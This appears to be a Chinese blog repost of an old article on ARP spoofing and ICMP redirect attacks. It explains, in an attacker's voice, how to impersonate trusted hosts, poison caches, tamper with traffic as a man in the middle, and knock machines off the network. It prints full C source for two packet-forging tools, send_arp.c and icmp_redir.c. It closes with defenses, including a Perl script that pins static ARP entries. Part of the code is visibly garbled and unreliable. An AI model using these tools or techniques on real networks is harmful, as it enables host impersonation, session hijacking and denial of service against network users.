现在的位置: 首页 > IT运维 > 正文

ARP和ICMP欺骗造就新式DoS工具

2011年03月18日 IT运维 ⁄ 共 305字 暂无评论 ⁄ 被围观 16+

用一些特殊的方法使用arp和icmp的时候,会得到意想不到的结果,例如达成DoS工具。

相对于被动攻击(网络监听sniffing)来说,主动攻击使用的并不普遍――许多管理员都拥有一个网络监听工具,帮助他们管理局域网。在你的LAN中,主动攻击将会给你的生活添加光彩和乐趣。你知道,仅仅是一些技术细节使得这些角落有些昏暗不明。那么,我们去看看那里究竟有些是什么。

我们首先描述一下网络欺骗(spoofing)和拒绝服务(DoS-deny of service)。象IP盲攻击一样,网络攻击常常非常普通并且功能强大,但是对使用者来说,需要做大量的工作(常常是猜),而且难于实行。但是ARP欺骗正好相反,它非常容易使用且方便。

ARP欺骗往往应用于一个内部网络,我们可以用它来扩大一个已经存在的网络安全漏洞。如果你可以入侵一个子网内的机器,其它的机器安全也将受到ARP欺骗的威胁。

让我们考虑一下的网络结构

IP        10.0.0.1  10.0.0.2  10.0.0.3  10.0.0.4
hostname   cat     rat      dog     bat
hw addr  AA:AA    BB:BB    CC:CC    DD:DD

所有的主机在以太网中以简单的方式进行连接(没有交换机,智能HUB)。你是cat,你具有root权限,你的目标是侵入dog。而你知道dog信任rat,所以如果你能伪装成rat,那么你就能获得一些意外的东西。

也许你首先想到的是,“为什么我不把我的IP设成rat的,然后...”,这种方式无法工作,无法可靠的工作。如果你将cat的IP设置成10.0.0.2,那么cat将以这个IP回答ARP请求。但是rat也会的。这样你们就进入了一个纯粹的竞争状态,而这场比赛没有赢家。相反的,你会轻易的输掉这场比赛,因为许多工具会立即发现这种IP冲突的现象,抱怨之声随之而来。一些网络交通分析工具还常常对它进行纪录。在网络管理员的日志文件中还会保留一条恶心的纪录(cat的物理地址),这可不是你想要的。你的不到你想要的东西,并且与你的目标背道而驰。

这个东西是你想要的,一个攻击程序――send_arp.c,一个非常有效的工具。正如它的名字所示,它发送一个ARP包(ARP回答,准确的说:由于这个协议是无状态的,即使在没有请求的时候也可以做出应答。请求同应答是一样的。)向网络上,你可以把这个包做成你想要的样子。而你想要的只不过是可以去定制源IP与目的IP,还有硬件地址。

当你进行ARP欺骗的时候,你不希望你的网卡乱说话,那么你可以用“ifconfig eth0 -arp”关掉你的ARP协议。当然,无论如何你都需要ARP的信息,手动的构建它并使它发向内核。重要的事你要获得你周围人们的信任。在这个例子中,你希望dog认为rat的硬件地址是AA:AA(cat),所以你发送一个ARP应答,它的源地址是10.0.0.2,源硬件地址是AA:AA,目标地址是10.0.0.3和目标硬件地址是CC:CC。现在,dog完全相信rat的硬件地址是AA:AA。当然dog中缓存会过期,所以它需要更新(重孝送请求)。多长时间发出请求,各个操作系统不同,但是大多来说是40秒钟左右。经常发送ARP应答,这对你来说不会有坏处的。

对于ARP缓存处理方法的不同会带来问题的复杂性。一些操作系统(例如Linux)会用向缓存地址发非广播的ARP请求来要求更新缓存(就象你妻子打电话来看你在不在一样)。这种缓存更新会给你增加麻烦,会使你刚刚伪造的ARP缓存被更改掉,所以必须避免此盛生。经常的向dog发出应答数据,这样它就不会发出请求。正是预防为主。对于rat来说,它根本就没有机会来改变这一切。

所以过程是简单的。首先来设置网络接口别名(ifconfig eth0:1 10.0.0.2),添加rat的IP地址并且打开ARP协议(ifconfig eth0 arp)――你需要设置你的ARP缓存,当没有ARP时,它不会工作。然后在正确的网络接口上设置到dog的由。再设置dog的ARP缓存。最后,关掉网络接口的ARP功能。这样一切就OK了。

现在,当你用send_arp将毒液注入之后(dog和rat),那么,dog就会认为,你就是rat。一定要记住,要持续不断的向dog和rat发出ARP包。这种攻击方式就仅仅工作在局域网内(通常的,ARP包是不会由的)。一个有趣的尝试是,把我们上述试验中dog替换成由器,如果可以实现的话(我不确定它是否会永远成立,由器的ARP功能不是那么容易欺骗的),你可以轻易的冒充这个局域网内的机器去欺骗这个Internet世界了。所以目标可以是任何一台机器,但是你要伪装的机器,必须是这个局域网内的。除了欺骗以外,你还可以用ARP作很多事。蓝天之下,皆可任你遨游。或者,DoS也是一个非常有用的程序。

给rat一个错误的硬件地址,是一个非常有效的让它闭嘴的方法。你可以避免它向一些特殊的机器发出请求(一个ARP缓冲池通常可以容括整个网络的内容,所以你可以在一段时间内有效的防止它向其它机器发出请求)。非常明显目标也可以是一台由器。干扰缓存需要两步:搅乱被伪装的机器和你不希望它与之通讯的机器。这种方法不是常常奏效,当这台机器发现缓存中没有目标机器时,会主动发出ARP请求。

当然你的下一滴毒液会迅速注入,但是你需要经常维持这种状态。一个比较有效的方法是,给rat一个错误的dog硬件地址,这样rat既能保持正常的工作状态,又不会干扰你的活动。同样的,这种方法也依赖于不同的环境,通常的情况是rat会经常的向错误的目标发出各种不同的包,目标会返回ICMP不可抵达信息,从而用一种不正当的方式维持了连接。这种伪装的连接可以推迟缓存的更新时间。在Linux上,我们可以是更新时间从1分钟提升到10分钟。在这一段时间内,你已经可以完成一个TCP连接可以完成的大多数事情了。

这里存在一个有趣被称为“无理ARP”。在这个ARP请求包中,源IP与目的IP是相同的,通常它是经过以太网广播进行发送。一些执行程序认为这是一种特殊情况――系统发出的自身更新信息,并且将这个请求添加在自己的缓存中。这种方式里,影响的是整个网络。这是毋庸置疑的,但这并不是ARP协议的一部分,而是由执行者决定是否作(或是不作),这渐渐的变得不受人欢迎。

ARP也可以用来开一些非常专业的笑话。假想一下某人设置了一个中继器或者是一个管道,仅仅是利用自己的机器去骗取两台相邻机器的信任,并且把通讯的包都发给这台机器。如果这台机器仅仅是转发数据,那么谁也不会发现。但是当它仅仅作一些很少的改动时,就会给你添加非常大的麻烦。例如,随机的更改数据包中的几位,这样就会造成校验和错误。数据流好像是毫发无损,却会毫无原因的出现不可预料的错误。

二、ICMP重定向

另外一个比较有效的并且类似与ARP欺骗的手段是利用另外一个正常的协议――ICMP重定向。这种重定向通常是由你的默认由器发来的,通告你有一个到达某一网络的更近的由。最初,既可以通告网络重定向,也可以通告主机的重定向,但是现在,由于网络重定向被否决,仅剩下了主机重定向。正确的制作一个经过完整检查的ICMP包(必须由默认由器发来,发向重定向机器,新的由应该是一个网络的直接连接等等),接收者会对系统的由表进行更新。

这是ICMP的安全问题。伪装一个由器的IP地址是简单的,icmp_redir.c正是作的这个工作。RFC声明系统必须遵循这个重定向,除非你是由器。实际上几乎所有的系统都支持这一点(除了vanilla Linux 2.0.30)。

ICMP重定向提供了一个非常有力的DoS工具。不像ARP缓存更新,由表不存在的过期问题。并且不需要在本地网络,你可以发起攻击从任何地方。所以当目标接受了ICMP重定向之后(包确切抵达),目标就不会再和网络上的一些机器进行通讯(是的,并不是所有的机器,但是一些与目标机器不在同一个网络上的机器)。域名服务器会是一个非常好的攻击目标。

/* send_arp.c
这个程序发送ARP包,由使用者提供源/目的IP和网卡地址。编译并运行在Linux环境下,
也可以运行在其它的有SOCK_PACKET的Unix系统上。
这个程序是对上述理论的验证,仅此而已。
*/
#include ...
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define DEFAULT_DEVICE "eth0"
char usage[]={"send_arp: sends out custom ARP packet.

 usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr

"};
struct arp_packet {
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};
void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);
int main(int argc,char** argv){
struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
if(argc != 5)die(usage);
sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
perror("socket");
exit(1);
}
pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);
get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);
get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);
memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s
",str);
exit(1);
}
void get_ip_addr(struct in_addr* in_addr,char* str){
struct hostent *hostp;
in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
if( (hostp = gethostbyname(str)))
bcopy(hostp->h_addr,in_addr,hostp->h_length);
else {
fprintf(stderr,"send_arp: unknown host %s
",str);
exit(1);
}
}
}
void get_hw_addr(char* buf,char* str){
int i;
char c,val;
for(i=0;i= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf = val <= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf++ |= val;
if(*str == ':')str++;
}
}

/* icmp_redir.c
本程序由用户提供的网关地址发送了一个ICMP主机重定向数据包。在Linux2.0.30上测试通过,并且对大多数的Unix机器有效。
这个程序是对上述理论的验证,仅此而已。
*/
#include ...
#define IPVERSION 4
struct raw_pkt {
struct iphdr ip; /* This is Linux-style iphdr.
Use BSD-style struct ip if you want */
[php]struct icmphdr icmp;
struct iphdr encl_iphdr;
char encl_ip_data[8];
};
struct raw_pkt* pkt;
void die(char *);
unsigned long int get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);
int main(int argc,char** argv){
struct sockaddr_in sa;
int sock,packet_len;
char usage[]={"icmp_redir: send out custom ICMP host redirect packet.
yuri volobuev'97

	usage: icmp_redir gw_host targ_host dst_host dummy_host
"};
char on = 1;
if(argc != 5)die(usage);
if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
perror("socket");
exit(1);
}
sa.sin_addr.s_addr = get_ip_addr(argv[2]);
sa.sin_family = AF_INET;
packet_len = sizeof(struct raw_pkt);
pkt = calloc((size_t)1,(size_t)packet_len);
pkt->ip.version = IPVERSION;
pkt->ip.ihl = sizeof(struct iphdr) >> 2;
pkt->ip.tos = 0;
pkt->ip.tot_len = htons(packet_len);
pkt->ip.id = htons(getpid() & 0xFFFF);
pkt->ip.frag_off = 0;
pkt->ip.ttl = 0x40;
pkt->ip.protocol = IPPROTO_ICMP;
pkt->ip.check = 0;
pkt->ip.saddr = get_ip_addr(argv[1]);
pkt->ip.daddr = sa.sin_addr.s_addr;
pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));
pkt->icmp.type = ICMP_REDIRECT;
pkt->icmp.code = ICMP_REDIR_HOST;
pkt->icmp.checksum = 0;
pkt->icmp.un.gateway = get_ip_addr(argv[4]);
memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
pkt->encl_iphdr.protocol = IPPROTO_IP;
pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
pkt->encl_iphdr.check = 0;
pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
sizeof(struct iphdr));
pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
sizeof(struct raw_pkt)-sizeof(struct iphdr));
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
perror("setsockopt: IP_HDRINCL");
exit(1);
}
if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s
",str);
exit(1);
}
unsigned long int get_ip_addr(char* str){
struct hostent *hostp;
unsigned long int addr;
if( (addr = inet_addr(str)) == -1){
if( (hostp = gethostbyname(str)))
return *(unsigned long int*)(hostp->h_addr);
else {
fprintf(stderr,"unknown host %s
",str);
exit(1);
}
}
return addr;
}
unsigned short checksum(unsigned short* addr,char len){
register long sum = 0;
while(len > 1){
sum += *addr++;
len -= 2;
}
if(len > 0) sum += *addr;
while (sum>>16) sum = (sum & 0xffff) + (sum >> 16);
return ~sum;
}

三、解决方案

对于大多数人来说,ARP是一个隐藏的底层协议。你可以时不时的观察它,但是平常不会有人对它发生兴趣。你可以用arp命令来检查你的ARP缓存,但是当一个网络出现问题的时候,这个并不是我们首先想到的。Windows也存在这个命令,记住这一点也许对你有帮助。但是当一个ARP欺骗通过网关从另一个网络发向你时,恐怕你也无能为力了。同样的,你也可以在你的由表中发现重定向的由信息(route 命令,用“D”标志来标明)。

ARP攻击设计来攻击10Base2以太网。如果网络已一些比较先进的方式进行连接,通常是智能HUB或交换机,那么攻击就很容易被发现,甚至是不可能的(类似于被动攻击)。所以这是一个向你的老板要求更新网络设备的理由。

这么想起来,ICMP重定向真是一个非常疯狂的想法。首先,一些网络的结构非常简单,对由表不需要任何添加;其次,大多数的稳定的网络上,仅仅是用手动的办法来更新由。这并不是一个经常更新的工作,为什么要通过ICMP呢?最后,这个对于你来说是非常危险的,你可以在你的系统上关闭ICMP重定向,这样可以减少同RFC1122的冲突。哎,这可不容易呀!在Linux这种提供源码的机器上,你可以重新编译内核。在Irix 6.2和一些其它的系统上,可以“set icmp_dropredirects=1”。这与其它的OS,我也不知道有什么办法。

时间证明了这个真理:不要信任未确认的主机。否则,网络上帝不会对你施予怜悯的。 一些人认为“我有防火墙,我怕谁”,认为一些安全问题对它来说无关紧要。我承认防火墙的作用,但是这并不是经常有效。

想象这样一个环境,所有的机器都直接与Internet相连,你不得不与你不了解的人共用你的内部网,他们使用的是vanilla SGI 的机器,而他们简直是在到处告诉别人“来攻击我吧,我的买主使它非常简单”(是这样的,那些人认识Unix,从侏罗纪公园...),另外,通向你的由器由别的机构控制。让我们来到一个标准的网络环境,它会提供我们安全,不受外部的攻击。人们在这里工作,使用电脑。同样,这里的每台机器也存在安全问题。所以,当你下一次提到防火墙的时候,请记住它并不能保护每一个人。

John Goerzen提供了一个Perl脚本,可以在系统启动时运行。它主要是在Linux机器中维持一个已知的IP地址与硬件地址的缓存,设置标志,以使其不会被更新和改变。配置文件非常简单――IP addr 配 MAC addr,用空格键分割,“#”作为注释。

这个脚本仅仅在Linux机器上测试过――在其它平台上的人需要修改arp命令的格式。

注意:脚本需要运行在网络接口启动之后,服务和客户运行之前;另外,一些人会在ARP被锁定时窃取连接。以下是它的脚本:

#!/usr/bin/perl
# Program: forcehwaddr
# Program to run ARP to force certain tables.
# Specify filenames to read from on command line, or read from stdin.
foreach () { # For each input line....
chomp; # Strip if CR/LF
if (/^#/) { next; } # If it's a comment, skip it.
if (((($host, $hw) = /s*(.+?)s+(S+)s*/) == 2) &&
!(/^#/)) {
# The text between the slashes parses the input line as follows:
# Ignore leading whitespace. (s*)
# Then, start matching and put it into $host ($host, (.+?))
# Skip over the whitespace after that (s+)
# Start matching. Continue matching until end of line or optional
# trailing whitespace.
# Then, the if checks to see that both a
# host and a hardware address were matched.
# (2 matches). If not, we skip the
# line (assuming it is blank or invalid or something).
# The second part of the if checks to see if the line starts with
# a pound sign; if so, ignore it (as a comment).
# Otherwise, run the appropriate command:

printf("Setting IP %-15s to hardware address %s
", $host, $hw);
system "/usr/sbin/arp -s $host $hw
";
}
}[/php]

给我留言

您必须 [ 登录 ] 才能发表留言!

×
#